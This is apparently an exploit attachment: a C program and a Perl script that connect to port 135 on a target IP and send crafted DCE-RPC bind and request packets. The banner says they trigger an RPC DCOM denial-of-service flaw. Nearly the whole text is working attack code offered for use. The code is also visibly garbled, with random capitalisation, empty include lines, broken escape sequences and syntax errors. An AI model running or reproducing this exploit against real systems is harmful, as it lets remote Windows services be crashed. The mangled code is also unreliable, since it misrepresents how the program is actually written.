Attachment
Test code
#include
#include
#include
#include
#include
#include
Unsigned char bindstr [] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x7f, 0x00, 0x00, 0x00,
0xD0, 0x16, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xA0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0x11, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00};
UNSIGNED Char Request [] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00,
0x90, 0x00, 0x00, 0x00, 0x01, 0x00, 0x03, 0x00, 0x05, 0x00, 0x06, 0x01, 0x00, 0x00, 0x00, 0x00,
0x31, 0x31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31,
0x31, 0x31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31, 0X31,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
Void main (int Argc, char ** argv)
{
Wsadata wsadata;
INT I;
Socket sock;
SockAddr_in addr_in;
Short port = 135;
UNSIGNED Char BUF1 [0x1000];
Printf ("RPC DCOM DOS Vulnerability Discoveried By Xfocus.org/N");
Printf ("Code by Flashsky, Flashsky @ Xfocus.org, Benjurry, Benjurry @ xfocus.org / n");
Printf ("Welcome to http://www.xfocus.net/n");
IF (Argc <2)
{
Printf ("Useage:% s Target / N", Argv [0]);
Exit (1);
}
IF (WsaStartup (MakeWord (2,0), & WSADATA)! = 0)
{
Printf ("WSAStartup Error.Error:% D / N", WsageTlasterror ());
Return;
}
Addr_in.sin_family = af_INet;
Addr_in.sin_port = htons (port);
Addr_in.sin_addr.s_un.s_addr = inet_addr (Argv [1]);
IF ((Sock = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == Invalid_socket
{
Printf ("socket failed.error:% d / n", wsagetlasterror ());
Return;
}
IF (Wsaconnect (STRUCKADDR *) & addr_in, sizeof (addr_in), null, null, null, null) == Socket_ERROR) {
Printf ("Connect Failed. Error:% D", Wsagetlasterror ());
Return;
}
IF (SOND (SOCK, BINDSTR, SIZEOF (BINDSTR), 0) == Socket_ERROR)
{
Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());
Return;
}
i = Recv (SOCK, BUF1, 1024, MSG_PEEK);
IF (SOND (SOCK, REQUEST, SIZEOF (Request), 0) == Socket_ERROR)
{
Printf ("Send Failed. Error:% D / N", Wsagetlasterror ());
Return;
}
i = Recv (SOCK, BUF1, 1024, MSG_PEEK);
}
#! / usr / bin / perl -w
# By Securiteam's Experts
MY $ BINDSTR = "/ x05 / x00 / x00 / x00 / x00 / x48 / x00 / x00 / x00 / xd0 / x16 / xd0 / x16 / x00 / x00 / X00 / x00 / x01 / x00 / x00 / x00 / x00 / xa0 / x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / X46 / X00 / X00 / X00 / X00 / X04 / XEB / X1C / XC9 / X11 / X9F / XE8 / X08 / X00 / X00 / X02 / X00 / X00 / X00 " ;
MY $ request = "/ x05 / x00 / x00 / x00 / x00 / x48 / x00 / x00 / x00 / x90 / x00 / x00 / x00 / x01 / x00 / X03 / X00 / X05 / X00 / X00 / X00 / X00 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X31 / X00 / X00 / X00 / X00 " ;
Use socket;
$ proto = getProtobyname ('TCP');
Socket (S, PF_INET, SOCK_STREAM, $ Proto) || DIE ("socket problem / n");
$ Ip = $ argv [0];
$ TARGET = INET_AON ($ IP);
$ Paddr = SockAddr_in (135, $ Target);
Connect (S, $ PADDR) || DIE "Connect: $!";
SELECT (S); $ | = 1;
Print $ bindstr;
Sleep (2);
Print $ Request;
Sleep (2);
SELECT (STDOUT);
Close (s);
